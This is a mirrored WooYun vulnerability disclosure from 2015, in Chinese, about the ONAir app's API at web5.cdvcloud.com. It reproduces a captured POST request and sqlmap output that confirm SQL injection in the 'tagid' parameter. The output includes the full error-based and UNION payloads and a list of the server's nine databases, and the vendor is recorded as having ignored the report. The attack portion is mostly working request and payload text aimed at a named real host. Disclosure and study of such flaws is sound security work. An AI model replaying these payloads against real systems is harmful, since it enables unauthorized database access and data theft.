乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-21: 细节已通知厂商并且等待厂商处理中 2015-05-26: 厂商已经主动忽略漏洞,细节向公众公开
*
ONAir 为云视旗下APP 存在接口e/extend/client_api/api.php 路径下貌似该API是这个APP的通用接口与我发的漏洞#2类似但是修补的时候只修复了我给出的参数,其他的参数却没有修改希望注意下依旧抓包截取数据
POST /e/extend/client_api/api.php HTTP/1.1Host: web5.cdvcloud.comProxy-Connection: closeAccept-Encoding: gzipContent-Type: application/x-www-form-urlencoded; charset=utf-8Content-Length: 69Connection: closeUser-Agent: OnAir 1.0 (iPhone; iPhone OS 8.3; zh_CN)act=get_vods&orderby=1&tagid=0&year=2015&i=1&sid=0&classid=6&mod=vod
存在注入:
sqlmap identified the following injection points with a total of 315 HTTP(s) requests:---Place: POSTParameter: tagid Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: act=get_vods&orderby=1&tagid=0 AND (SELECT 4950 FROM(SELECT COUNT(*),CONCAT(0x3a6a67743a,(SELECT (CASE WHEN (4950=4950) THEN 1 ELSE 0 END)),0x3a65687a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&year=2015&i=1&sid=0&classid=6&mod=vod Type: UNION query Title: MySQL UNION query (NULL) - 1 column Payload: act=get_vods&orderby=1&tagid=0 UNION ALL SELECT CONCAT(0x3a6a67743a,0x74676e594172694c4264,0x3a65687a3a)#&year=2015&i=1&sid=0&classid=6&mod=vod---[13:10:46] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.4.23back-end DBMS: MySQL 5.0[13:10:46] [INFO] fetched data logged to text files under 'D:\Python27\sqlmap\output\web5.cdvcloud.com'[*] shutting down at 13:10:46
库:
available databases [9]:[*] information_schema[*] mysql[*] security[*] test[*] ugc[*] vms[*] vms2_1[*] zqcms[*] zqcms_test
危害等级:无影响厂商忽略
忽略时间:2015-05-26 15:38
漏洞Rank:4 (WooYun评价)
暂无